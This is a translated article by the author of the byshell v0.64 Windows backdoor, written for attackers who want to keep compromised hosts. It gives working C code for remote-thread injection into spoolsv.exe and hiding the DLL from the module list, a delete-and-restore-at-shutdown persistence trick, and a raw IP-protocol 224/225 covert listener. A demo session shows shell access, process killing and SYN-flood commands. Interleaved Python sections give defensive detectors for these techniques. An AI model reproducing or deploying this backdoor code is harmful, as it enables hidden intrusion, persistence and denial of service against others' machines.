System-level ring3 BackDoor-byshell v0.64 programming and application (zz)

Source: Internet
Author: User
Part 1: Background
There are many popular post-intrusion "trojan" tools on the Internet today, but few deserve to be called excellent products. Most newcomers still use winshell, Glacier, or Radmin-style "remote management software" in place of a backdoor. Unfortunately, these do not meet the standard of a real backdoor and are easily dealt with by administrators with or without experience, so it is normal that compromised hosts are frequently lost.

A qualified backdoor should implement at least the following. There must be no unfamiliar process in Task Manager; a process name that merely resembles a system process is only a stopgap. No well-known startup key or added service may appear in the registry's startup or service entries, and of course nothing may be written directly to the Start Menu startup folder. It must not open a strange port that the administrator or firewall will notice; a program like bits.dll, which has no port while waiting for a connection and only opens one once the connection is made, passes a port check only while idle. In addition, it is best to hide your new files, or to avoid infecting system files whose integrity administrators routinely check. A backdoor that does not implement the first three points is not a "relatively advanced" backdoor.

By my classification, common backdoors fall into three levels.
Application level: winshell, Radmin, Glacier, and the like. These basically do not hide themselves; they are just applications that provide remote control.
System level: these use, to a greater or lesser degree, ring3 programming techniques to hide their tracks, such as bits.dll, Portless, and many others like hxdef (although hxdef has a driver, its hooks into the system are all at the Win32 API level, so people tend to place it at the system level rather than the kernel level).
Kernel level: the backdoor works mainly in ring0, so it is better concealed and more lethal. However, kernel-level backdoors are few and their compatibility is unsatisfactory. Many valuable discussions and results on this topic have been published in Phrack and on rootkit.com.

As a beginner in this field, I have tried my best to meet the above requirements in my own system-level backdoor, byshell v0.64. Because of my limited ability, it is not yet comprehensive or stable enough. The program's source code is released with it, and I hope you will give me comments or upgrade it for me before New Year's Day :) Below we discuss the design and implementation of this open-source backdoor, with some examples of its use, of course :)

Part 2: Programming
In this section I will not list the complete code, which is too long; I will quote the key code from the original source to explain my design ideas.

The first problem is how to hide the process. The common method is remote thread injection, which is relatively simple to implement. Its biggest problem is that the code is injected into another process's address space: because the address space has changed, every directly addressed instruction from the original address space has to be relocated. Assembly-language veterans understand this easily; for high-level-language programmers it means that all explicit and implicit global variables, such as API addresses and strings, must be relocated by hand. Compared with virus writers we are lucky, because our injector can inject a "global variable block" into the remote process at the same time, pass the block's address to the remote function, and have the remote function use that block in place of real global variables, which avoids writing fully "self-relocating" code. The latter is considered very cumbersome and is nearly impossible in a high-level language. Even so, the complexity of relocatable code remains considerable, and a backdoor with many functional modules would be very tiring to write this way. In the source of cmdbind2, the fully hand-relocated injected backdoor by the senior author Farmer, we can see that implementing just the most common bind shell already costs a lot of code. A backdoor with complex functions like byshell v0.64 is hard to imagine if implemented directly by this method.

Instead of writing relocatable code directly, the common method is to have the function injected into the remote process load a DLL. The system then performs the relocation for you, and the backdoor's main functionality is implemented in the DLL; Dan Changhong introduced this method in an earlier article. It has a small drawback: when the administrator examines the process you injected, an unknown DLL is found, and your backdoor is exposed. Farmer proposed a way around this: load the DLL first, copy its entire memory image somewhere else, unload the DLL, then allocate an empty block at the same address the original DLL occupied and copy the saved DLL code back into it. After that the DLL is called directly, and our DLL does not appear in the injected process's loaded-module list. Farmer did not turn his idea into code; the main code implementing this method is provided here. Along the way we also compare other system-level process-hiding methods.

The senior author Bingle used the method of replacing a DLL service started by svchost to load the backdoor, and zxshell also uses this method. The main problem with this kind of registration is that it is unstable: sensitive registry key values are changed, and an unknown module appears in the loaded-module list. Of course, if you replace the original DLL with a trojan DLL of the same name, you avoid those problems, but a new one appears: how to bypass Windows File Protection and the administrator's routine system-file integrity checks.

hxdef uses Win32 API hooking to hide every aspect of hxdef. This method holds up well against ring3 checks and can partially implement port multiplexing. Its main problems are that it is too "active" (hxdef injects trojan data into every process in the system), so although the effect is good, it is very easily found by a ring0 rootkit detector such as IceSword; and finally, programming it is cumbersome.

I used the method of injecting into spoolsv.exe, the mostly idle print spooler service: the injected function remotely loads and then unloads the trojan DLL, ntboot.dll. The injector is ntboot.exe. For details, see the injection code in ntboot.exe.

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>

// Global variable block handed to the injected function: the API addresses it
// needs, resolved here so the remote code has no imports of its own to relocate.
typedef struct _INJAPISTR {
    HINSTANCE (__stdcall *myloadlibrary)(const char *);
    FARPROC   (__stdcall *mygetprocaddress)(HMODULE, LPCTSTR);
    void *    (__stdcall *myvirtualalloc)(void *, unsigned long, unsigned long, unsigned long);
    int       (__stdcall *myfreelibrary)(HINSTANCE);
    int       (__stdcall *myisbadreadptr)(const void *, unsigned int);
    int       (__stdcall *myvirtualfree)(void *, unsigned long, unsigned long);
} INJAPISTR;
INJAPISTR injapistr;   // contents of the global variable block

void injcode(void)
{
    HANDLE prohandle;   // handle of the target process
    DWORD pid = 0;      // PID of the target process
    int ret;            // temporary

    // Find the target PID with the ToolHelp32 snapshot functions.
    Sleep(1000);
    HANDLE snapshot;
    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    struct tagPROCESSENTRY32 processsnap;
    processsnap.dwSize = sizeof(PROCESSENTRY32);
    char injexe[] = "spoolsv.exe";   // target process; change it as you like
    for (Process32First(snapshot, &processsnap);
         Process32Next(snapshot, &processsnap);) {
        if (!stricmp(processsnap.szExeFile, injexe)) {
            pid = processsnap.th32ProcessID;
            break;
        }
    }
    CloseHandle(snapshot);   // PID obtained

    // Acquire SE_DEBUG_NAME; not explained again, many articles cover it.
    HANDLE htoken;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &htoken);
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(htoken, 0, &tp, sizeof(tp), 0, 0);

    // Now inject.
    prohandle = OpenProcess(PROCESS_ALL_ACCESS, 1, pid);
    DWORD WINAPI injfunc(LPVOID);   // injfunc is the injected function; it must be hand-relocated

    // Resolve the API addresses the remote code needs and store them in the
    // global variable block to be injected.
    HMODULE hmodule;
    LPVOID paramaddr;   // address of the global variable block in the target
    hmodule = LoadLibrary("kernel32.dll");
    injapistr.myloadlibrary = (HINSTANCE (__stdcall *)(const char *))
        GetProcAddress(hmodule, "LoadLibraryA");
    injapistr.mygetprocaddress = (FARPROC (__stdcall *)(HMODULE, LPCTSTR))
        GetProcAddress(hmodule, "GetProcAddress");
    injapistr.myvirtualalloc = (void * (__stdcall *)(void *, unsigned long, unsigned long, unsigned long))
        GetProcAddress(hmodule, "VirtualAlloc");
    injapistr.myfreelibrary = (int (__stdcall *)(HINSTANCE))
        GetProcAddress(hmodule, "FreeLibrary");
    injapistr.myisbadreadptr = (int (__stdcall *)(const void *, unsigned int))
        GetProcAddress(hmodule, "IsBadReadPtr");
    injapistr.myvirtualfree = (int (__stdcall *)(void *, unsigned long, unsigned long))
        GetProcAddress(hmodule, "VirtualFree");

    // Allocate the global variable block in the target and write the API addresses into it.
    paramaddr = VirtualAllocEx(prohandle, 0, sizeof(injapistr), MEM_COMMIT | MEM_RESERVE,
                               PAGE_EXECUTE_READWRITE);
    ret = WriteProcessMemory(prohandle, paramaddr, &injapistr, sizeof(injapistr), 0);

    // Write the injfunc function itself.
    void *injfuncaddr = VirtualAllocEx(prohandle, 0, 20000, MEM_COMMIT | MEM_RESERVE,
                                       PAGE_EXECUTE_READWRITE);
    ret = WriteProcessMemory(prohandle, injfuncaddr, injfunc, 20000, 0);

    // Start the remote thread.
    CreateRemoteThread(prohandle, 0, 0, (DWORD (WINAPI *)(void *))injfuncaddr, paramaddr, 0, 0);
    CloseHandle(prohandle);
    return;
}

// The injected function: it does the hard work of loading, and then
// "unloading", the large and complicated trojan DLL :)
DWORD WINAPI injfunc(LPVOID paramaddr)
{
    // paramaddr: first address of the global variable block.
    // Every static global (directly addressed) needs relocation; heap
    // (VirtualAlloc) and stack variables do not, since they are addressed
    // indirectly. The strings could also have gone into the global block, but
    // there are few of them, so building them with inline asm is convenient.
    char ntboot[16];
    char msgbox[16];   // badly named: this is the name of the DLL backdoor's main function
    INJAPISTR *pinjapistr = (INJAPISTR *)paramaddr;
    HMODULE hmodule;
    __asm {
        mov ntboot, 'n'
        mov ntboot + 1, 't'
        mov ntboot + 2, 'b'
        mov ntboot + 3, 'o'
        mov ntboot + 4, 'o'
        mov ntboot + 5, 't'
        mov ntboot + 6, '.'
        mov ntboot + 7, 'd'
        mov ntboot + 8, 'l'
        mov ntboot + 9, 'l'
        mov ntboot + 10, 0
        mov msgbox, 'C'
        mov msgbox + 1, 'M'
        mov msgbox + 2, 'D'
        mov msgbox + 3, 's'
        mov msgbox + 4, 'E'
        mov msgbox + 5, 'R'
        mov msgbox + 6, 'V'
        mov msgbox + 7, 'I'
        mov msgbox + 8, 'C'
        mov msgbox + 9, 'E'
        mov msgbox + 10, 0
    }
    hmodule = pinjapistr->myloadlibrary(ntboot);   // load ntboot.dll
    DWORD (WINAPI *mydomainservice)(LPVOID);         // the DLL backdoor's main function
    mydomainservice = (DWORD (WINAPI *)(LPVOID))(pinjapistr->mygetprocaddress(hmodule, msgbox));

    // Now the trick that releases the DLL from the module list!
    // Hey, this is the highlight of the show.
    unsigned int memsize = 0;
    void *tempdll = pinjapistr->myvirtualalloc(0, 0x23000, MEM_COMMIT | MEM_RESERVE,
                                               PAGE_EXECUTE_READWRITE);
    memcpy(tempdll, hmodule, 0x23000);
    // 0x23000 is the DLL size; if the size of ntboot.dll changes, adjust this value.
    pinjapistr->myfreelibrary(hmodule);
    hmodule = (HMODULE)pinjapistr->myvirtualalloc(hmodule, 0x23000, MEM_COMMIT | MEM_RESERVE,
                                                  PAGE_EXECUTE_READWRITE);
    memcpy(hmodule, tempdll, 0x23000);
    pinjapistr->myvirtualfree(tempdll, 0x23000, MEM_DECOMMIT);
    // Done: the DLL is no longer "loaded", yet it can still be used.
    mydomainservice(0);   // nothing more: call the backdoor's main function :)
    return 0;
}
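The load/copy-out/FreeLibrary/copy-back trick above leaves a footprint a defender can look for: after it runs, the old image base is a committed MEM_PRIVATE region with execute permission whose first bytes are still an MZ/PE header, but no entry in the process's module list covers it, and the raw copy of injfunc is executable private memory with no header at all. The Python below is an added example, not byshell's or the author's code: it implements that check over constructed region and module records shaped like what a VirtualQueryEx/ReadProcessMemory walk and a Module32First/Next enumeration return. All addresses, sizes and names are made up.

```python
import struct
from dataclasses import dataclass

# Windows memory-region constants (values from winnt.h).
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY


@dataclass
class Region:
    """One entry as VirtualQueryEx would report it, plus the first bytes of the region."""
    base: int
    size: int
    state: int
    type_: int
    protect: int
    head: bytes


@dataclass
class Module:
    """One entry from the process's loaded-module list (Module32First/Next)."""
    name: str
    base: int
    size: int


def looks_like_pe(head: bytes) -> bool:
    """True if the bytes start with an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", head, 0x3C)[0]
    return len(head) >= e_lfanew + 4 and head[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_suspicious_exec_regions(regions, modules):
    """Return (base, reason) for committed executable regions no module entry accounts for.

    Two cases: a region that still begins with a PE header (the copied-back DLL
    after FreeLibrary), and plain executable private memory with no header at
    all (the hand-copied injfunc). JIT engines also produce the second kind, so
    treat it as a triage lead rather than a verdict.
    """
    findings = []
    for r in regions:
        if r.state != MEM_COMMIT or not (r.protect & EXEC_MASK):
            continue
        listed = any(m.base <= r.base < m.base + m.size for m in modules)
        if listed:
            continue
        if looks_like_pe(r.head):
            findings.append((r.base, "unlisted PE image"))
        elif r.type_ == MEM_PRIVATE:
            findings.append((r.base, "executable private memory outside any module"))
    return findings


def fake_pe_header(size: int = 0x100) -> bytes:
    """Constructed minimal header: 'MZ', e_lfanew = 0x80, 'PE\\0\\0' at 0x80."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed snapshot of a spoolsv.exe-like process (addresses and sizes are made up).
SAMPLE_MODULES = [
    Module("spoolsv.exe", 0x01000000, 0x10000),
    Module("kernel32.dll", 0x7C800000, 0xF6000),
]
SAMPLE_REGIONS = [
    Region(0x01000000, 0x10000, MEM_COMMIT, MEM_IMAGE, PAGE_EXECUTE_READ, fake_pe_header()),
    Region(0x7C800000, 0xF6000, MEM_COMMIT, MEM_IMAGE, PAGE_EXECUTE_READ, fake_pe_header()),
    Region(0x00130000, 0x1000, MEM_COMMIT, MEM_PRIVATE, PAGE_READWRITE, b"\x00" * 0x100),  # heap
    # Former DLL base: private, RWX, PE header intact, no module entry.
    Region(0x10000000, 0x23000, MEM_COMMIT, MEM_PRIVATE, PAGE_EXECUTE_READWRITE, fake_pe_header()),
    # Raw copy of the injected function: code bytes, no header.
    Region(0x00400000, 0x5000, MEM_COMMIT, MEM_PRIVATE, PAGE_EXECUTE_READWRITE,
           b"\x55\x8b\xec" + b"\x90" * 0xFD),
]

if __name__ == "__main__":
    for base, why in find_suspicious_exec_regions(SAMPLE_REGIONS, SAMPLE_MODULES):
        print(f"0x{base:08x}: {why}")
```

On a live host the same two functions would be fed from a VirtualQueryEx loop over the target and a ToolHelp module snapshot; the PE-header case is the strong signal, since legitimate loaders never leave a header in private memory the module list does not know about.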

The next problem is the startup item and the files. ntboot.exe, the backdoor injector, starts itself as a service, but the administrator must not be able to discover the service key. What to do? This is also an idea proposed by Farmer: first delete all the backdoor's files and its service, then set a shutdown notification and a journal hook which, at shutdown, write the files and the service entries back. Likewise, as soon as the service starts, it deletes them again. In this way, while the system is running there are no files and no startup items; the administrator cannot find anomalies by registry comparison and has nowhere to find our backdoor. Let's look at the code that sets the shutdown notification and the shutdown hook.

HHOOK msghook;                   // journal-record hook handle
void resume(void);               // restores the files and the startup item (defined elsewhere in ntboot)
BOOL WINAPI handlerroutine(DWORD dwctrltype);
LRESULT CALLBACK journalrecordproc(int code, WPARAM wparam, LPARAM lparam);

DWORD WINAPI hookthread(LPVOID lpparam)
{
    MSG msg; int tmpret; char tmpstr[100];
    msghook = SetWindowsHookEx(WH_JOURNALRECORD, journalrecordproc, GetModuleHandle(0), 0);
    if (!msghook) { MessageBox(0, itoa(GetLastError(), tmpstr, 10), 0, 0); DebugBreak(); }
    tmpret = SetConsoleCtrlHandler(handlerroutine, 1);
    if (!tmpret) { MessageBox(0, itoa(GetLastError(), tmpstr, 10), 0, 0); DebugBreak(); }
    while (GetMessage(&msg, NULL, 0, 0)) {
        if (msg.message == WM_QUERYENDSESSION) { resume(); }
    }
    UnhookWindowsHookEx(msghook);
    return 0;
}

BOOL WINAPI handlerroutine(DWORD dwctrltype)
{
    switch (dwctrltype) {
    case CTRL_SHUTDOWN_EVENT:
        resume();   // resume(), as the name suggests, restores the files and the startup item
        break;
    default:
        break;
    }
    return 0;
}

LRESULT CALLBACK journalrecordproc(int code, WPARAM wparam, LPARAM lparam)
{
    if (code < 0) { return CallNextHookEx(msghook, code, wparam, lparam); }
    if (code == HC_ACTION) {
        EVENTMSG *pevent = (EVENTMSG *)lparam;
        if (pevent->message == WM_KEYDOWN && LOBYTE(pevent->paramL) == 0xff) { resume(); }
    }
    return CallNextHookEx(msghook, code, wparam, lparam);
}
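The restore-at-shutdown scheme defeats a registry diff taken while the machine is up, but each re-registration of the service goes through the Service Control Manager, which records it in the System event log as event ID 7045 ("A service was installed in the system"), and the service is absent from the live service list whenever the host is running. The Python below is an added example, not ntboot's code: it cross-checks constructed 7045 records against a constructed live service inventory and file listing. The one-line export format of the records is an assumption, and the service names, paths and timestamps are made up.

```python
import re
from collections import defaultdict

# Constructed System-log records, flattened to one line each in the shape
# "<date> <time> <event id> Service Name: <name> Service File Name: <path>".
# The format is an assumption about how the log was exported.
SAMPLE_EVENTS = """\
2004-12-19 08:01:12 7045 Service Name: Dhcp Service File Name: C:\\WINNT\\system32\\svchost.exe -k netsvcs
2004-12-19 08:01:13 7045 Service Name: Spooler Service File Name: C:\\WINNT\\system32\\spoolsv.exe
2004-12-19 18:30:02 7045 Service Name: ntboot Service File Name: C:\\WINNT\\system32\\ntboot.exe
2004-12-20 07:59:58 7036 The Event Log service entered the running state.
2004-12-20 18:02:11 7045 Service Name: ntboot Service File Name: C:\\WINNT\\system32\\ntboot.exe
2004-12-21 17:58:45 7045 Service Name: ntboot Service File Name: C:\\WINNT\\system32\\ntboot.exe
"""

EVENT_7045 = re.compile(
    r"^(?P<ts>\S+ \S+) 7045 Service Name: (?P<name>\S+) "
    r"Service File Name: (?P<path>.+?)(?: -k \S+)?$"
)


def parse_7045(text: str):
    """Extract (timestamp, service name, image path) from every 7045 line; other events are ignored."""
    events = []
    for line in text.splitlines():
        m = EVENT_7045.match(line)
        if m:
            events.append((m["ts"], m["name"], m["path"]))
    return events


def transient_services(events, live_services, files_on_disk):
    """Flag services the log says were installed but the running system does not show.

    live_services: names from the current SCM list (sc query, or the
    HKLM\\SYSTEM\\CurrentControlSet\\Services key read while the host is up).
    files_on_disk: image paths that exist right now.
    """
    installs = defaultdict(list)
    image = {}
    for ts, name, path in events:
        installs[name].append(ts)
        image[name] = path
    findings = []
    for name, stamps in installs.items():
        reasons = []
        if name not in live_services:
            reasons.append("installed per event log but absent from live service list")
        if image[name] not in files_on_disk:
            reasons.append("image file missing on disk")
        if len(stamps) > 1:
            reasons.append(f"re-installed {len(stamps)} times (last {stamps[-1]})")
        if reasons:
            findings.append((name, reasons))
    return findings


# Constructed runtime inventory: what sc query and a directory listing show while the host is up.
LIVE_SERVICES = {"Dhcp", "Spooler", "Eventlog", "RpcSs"}
FILES_ON_DISK = {r"C:\WINNT\system32\svchost.exe", r"C:\WINNT\system32\spoolsv.exe"}

if __name__ == "__main__":
    for name, reasons in transient_services(parse_7045(SAMPLE_EVENTS), LIVE_SERVICES, FILES_ON_DISK):
        print(name, "->", "; ".join(reasons))
```

The same comparison works without the event log: a Services hive copied while the machine is shut down (from a boot disk or the offline volume) contains the key the runtime registry lacks, so diffing an offline snapshot against the live one finds the entry that only exists between shutdown and the next service start.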

Compared with hxdef's hooking of the file and registry APIs, the advantage of this method is that there is no file at all, so no ring0 rootkit detector can find files or registry keys hidden by hooked APIs, because there are none to find. The downside is that if the other side shuts down by pulling the power, we ...... rest in peace. So we console ourselves that this backdoor is concealed enough that the other party will never suspect a backdoor and resort to the brutal measure of cutting the power. If you use hxdef instead, with rootkit detectors now so common, a well-known rootkit like hxdef will be found at the administrator's inspection, and it will be the backdoor that rests in peace.

The last step is how to achieve "portless" operation. (Hiding a port with a rootkit is not "portless": not only does it fail to pass the firewall, it is exposed as soon as the administrator port-scans his own machine.) Haha, this is the weak point of byshell v0.64. A ring3 backdoor has difficulty with port multiplexing. Listening for TCP on a raw socket can only achieve what bits.dll does, "no port while waiting for a connection". Loading yourself as an SPI base service provider or layered service provider intercepts all ring3 network traffic, but leaves enough information in the registry and the system to expose the rest of our backdoor. hxdef hooks the recv/WSARecv functions of every process in the system. At ring0, ports such as 139 and 445 can be reused, and that seems better than ring3 port reuse. So far byshell uses a custom protocol over SOCK_RAW, that is, a protocol that is neither TCP nor UDP. It passes most software firewalls and some hardware firewalls, but its disadvantage is that it is not guaranteed to pass all firewalls, and it does not support Windows XP SP2, because M$ removed raw socket support there. Quite a few system-level backdoors seem to use this method. My implementation is also rather simple: IP protocol number 224 listens for connection and refresh, and protocol number 225 carries the backdoor data. Very simple.

// Fragment of the listener; ret, dwthreadid, PWD, ip_header and the labels are defined elsewhere in byshell's source.
WSADATA wsadata;
WSAStartup(MAKEWORD(2, 2), &wsadata);
SOCKET sock224 = socket(AF_INET, SOCK_RAW, 224);
sockaddr_in srvaddr;
memset(&srvaddr, 0, sizeof(struct sockaddr_in));
srvaddr.sin_family = AF_INET;
srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
ret = bind(sock224, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr));
if (ret) { goto label2; }
dwthreadid = 0; char buff[128];
DWORD WINAPI threadfunc(LPVOID lpparam);
HANDLE thrdhndl;
// Create the protocol-225 connection thread.
thrdhndl = CreateThread(0, 0, threadfunc, 0, 0, &dwthreadid);
// Wait for a refresh.
while (1) {
    recvfrom(sock224, buff, sizeof(buff), 0, 0, 0);
    if (!strncmp(buff + 32 + sizeof(ip_header), "+_)(*&^%$#@!~byrefreshbreak", 27)
        && !strncmp(buff + sizeof(ip_header), PWD, strlen(PWD))) {
        TerminateThread(thrdhndl, 0); goto label1;
    }
}
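Seen from the network, the 224/225 channel is invisible to a port scan and to port-based firewall rules, but the protocol number sits in byte 9 of every IPv4 header, and 224 and 225 fall in the range IANA has never assigned (145 to 252 are unassigned in the current registry; 253 and 254 are for experimentation, 255 is reserved). The Python below is an added example rather than byshell's code: it parses IPv4 headers from constructed packets and flags datagrams whose protocol is outside a host baseline (ICMP, TCP and UDP here, an assumed baseline for an ordinary Windows host) or unassigned altogether. Addresses and payloads are made up, and a truncated packet is included to show the parser rejecting it.

```python
import struct

# IPv4 protocol numbers the IANA registry lists as Unassigned (145-252);
# 253-254 are for experimentation and 255 is reserved.
IANA_UNASSIGNED = frozenset(range(145, 253))
# Assumed baseline for an ordinary Windows host: ICMP, TCP, UDP.
DEFAULT_BASELINE = frozenset({1, 6, 17})


def parse_ipv4(pkt: bytes) -> dict:
    """Parse the fixed IPv4 header; raise ValueError for anything not a sane v4 datagram."""
    if len(pkt) < 20:
        raise ValueError("short packet")
    (ver_ihl, _tos, total_len, _ident, _flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack_from("!BBHHHBBH4s4s", pkt, 0)
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(pkt) < ihl or total_len < ihl:
        raise ValueError("malformed IPv4 header")
    return {
        "src": ".".join(map(str, src)),
        "dst": ".".join(map(str, dst)),
        "proto": proto,   # byte 9 of the header: the field a raw-socket channel cannot hide
        "ttl": ttl,
        "payload": pkt[ihl:total_len],
    }


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Constructed datagram for the sample capture; the checksum is left zero since we only parse."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, proto, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    return hdr + payload


def flag_unexpected(packets, baseline=DEFAULT_BASELINE):
    """Return (src, dst, proto, reason) for datagrams outside the baseline; malformed ones are skipped."""
    findings = []
    for pkt in packets:
        try:
            h = parse_ipv4(pkt)
        except ValueError:
            continue
        if h["proto"] in baseline:
            continue
        reason = ("IANA-unassigned protocol" if h["proto"] in IANA_UNASSIGNED
                  else "protocol outside host baseline")
        findings.append((h["src"], h["dst"], h["proto"], reason))
    return findings


# Constructed capture: addresses and payloads are made up.
SAMPLE_PACKETS = [
    build_ipv4("10.0.0.5", "10.0.0.1", 6, b"\x04\xd2\x00\x50" + b"\x00" * 16),   # TCP
    build_ipv4("10.0.0.5", "10.0.0.1", 17, b"\x00" * 8),                         # UDP
    build_ipv4("10.0.0.7", "10.0.0.5", 224, b"by" + b"\x00" * 30),               # control channel
    build_ipv4("10.0.0.5", "10.0.0.7", 225, b"\x00" * 40),                       # data channel
    build_ipv4("10.0.0.5", "10.0.0.1", 47, b"\x00" * 4),                         # GRE: assigned, not baseline
    b"\x45\x00\x00",                                                             # truncated fragment
]

if __name__ == "__main__":
    for src, dst, proto, why in flag_unexpected(SAMPLE_PACKETS):
        print(f"{src} -> {dst} proto {proto}: {why}")
```

The same rule is what a firewall default-deny on IP protocol expresses: permit the protocols the host is known to need and log everything else, which catches a non-TCP, non-UDP channel regardless of which number it picks.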

In the protocol-225 code I implemented simple error control. That code is long and I will not list it here; if you are interested, check the source. This multiplexing method is not very reliable or stable, so I also published byshell v0.63, which directly opens TCP port 138. That completely fails the backdoor requirements, but it is acceptable for testing; if you find byshell v0.64 unstable, try it. A serious mistake, however, is that the byshell v0.64 manual is missing the command refresh, which clears the 225 connection when it has hung and gives you the chance to reconnect.

Finally, byshell implements many commands: viewing system information, executing commands, connecting to the backdoor's shell, SYN flood, and so on. The backdoor's functional module is the work() function, which makes extending functions and modular programming easy. My programming style is not good; I like compact code with few branches :( but I still hope everyone will develop this software together. I will keep improving the port-multiplexing situation; later it may be written as hxdef-style ring3 multiplexing, or perhaps as something like a ring0 filter driver. I also hope the seniors will keep guiding me :) In writing this backdoor, three people gave me the greatest help, and I thank them for letting me take up the space here: gxisone, Glacier, and Farmer. Half of this backdoor should be credited to them.

Part 3: Application
For use, the backdoor (0.64) supports the following commands: cmd, shell, endshell, chpass, byver, sysinfo, pslist, pskill, modlist, get, put, reboot, dettach, popmsg, syn, querydos, enddos, refresh, and so on. See the manual for details. Note that refresh is missing from the manual: it gives you a chance to reconnect when the connection hangs, and after you change IP address it clears the original connection (otherwise the new connection fails). Upload ntboot.exe and ntboot.dll into the same directory and run ntboot.exe -install. After installation, if you did not upload into the System32 directory, manually delete ntboot.exe and ntboot.dll. To connect, use by064cli.exe. Note that byshell v0.64 does not support local testing; v0.63 does, so I will use v0.63 to briefly demonstrate the effect.

Please input the server IP address
127.0.0.1
127.0.0.1 will be connected
Input the password (the default one is 'by')
by
# Export dir C:\
The volume in drive C is not labeled.
The serial number of the volume is CCB2-D751

Directory of C:\

<Dir> Documents and Settings
<Dir> inetpub
2004-11-17 20:56 <dir> intel
24,576 isapilog. dll
2004-11-11 24,576 magic_asp.dll
<Dir> my music
124 operate. ini
<Dir> Program Files
<Dir> ubackup
<Dir> winnt
3 files in 49,276 bytes
124,207,104 bytes available for 7 Directories
# shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\winnt\system32>cd ..
cd ..

C:\winnt>cd ..
cd ..

C:\>dir
dir
The volume in drive C is not labeled.
The serial number of the volume is CCB2-D751

Directory of C:\

...... Omitted
3 files in 49,276 bytes
124,207,104 bytes available for 7 Directories

C:\>endshell
Shell terminated
# byver
byshell server version 0.63
Released Dec 19, 2004  Copyleft @ "by" Co. Ltd.
# pslist
............ there are bugs here, the columns are not aligned neatly. Let's take a look :(
Process:
PID filename num_thread parentpid
8 system 43 0
184 smss.exe 6 8
208 csrss.exe 11 184
232 winlogon.exe 19 184
260 services.exe 31 232
272 lsass.exe 17 232
456 svchost.exe 11 260
488 spoolsv.exe 14 260
524 msdtc.exe 21 260
636 svchost.exe 18 260
656 llssrv.exe 9 260
688 sqlservr.exe 28 260
776 winmgmt.exe 3 260
812 dfssvc.exe 2 260
832 inetinfo.exe 29 260
856 mssearch.exe 6 260
1224 svchost.exe 11 260
1176 explorer.exe 19 1172
1356 igfxtray.exe 2 1176
1404 pfwmain.exe 4 1176
1412 soundman.exe 2 1176
1428 realsched.exe 4 1176
1436 internat.exe 1 1176
1444 sqlmangr.exe 3 1176
1280 bitcomet.exe 9 1176
328 notepad.exe 2 1176
1196 mdm.exe 5 456
1512 conime.exe 1 1088
1520 cmd.exe 1 488
1504 by063cli.exe 1 1176
# pskill 1428
OK, job was done, cuz we have LocalSystem & SE_DEBUG_NAME :)
# modlist 1520

Mods' of 1520:
module_id module_name module_path
1 ntdll.dll C:\winnt\system32\ntdll.dll
1 kernel32.dll C:\winnt\system32\kernel32.dll
1 user32.dll C:\winnt\system32\user32.dll
1 gdi32.dll C:\winnt\system32\gdi32.dll
1 advapi32.dll C:\winnt\system32\advapi32.dll
1 rpcrt4.dll C:\winnt\system32\rpcrt4.dll
1 msvcrt.dll C:\winnt\system32\msvcrt.dll
1 imm32.dll C:\winnt\system32\imm32.dll
#
Try the other, more complex commands yourself. Finally, if you have any questions or want to get in touch, mail me at baiyuanfan@163.com. Thank you for your attention to byshell and to me :)
(End)
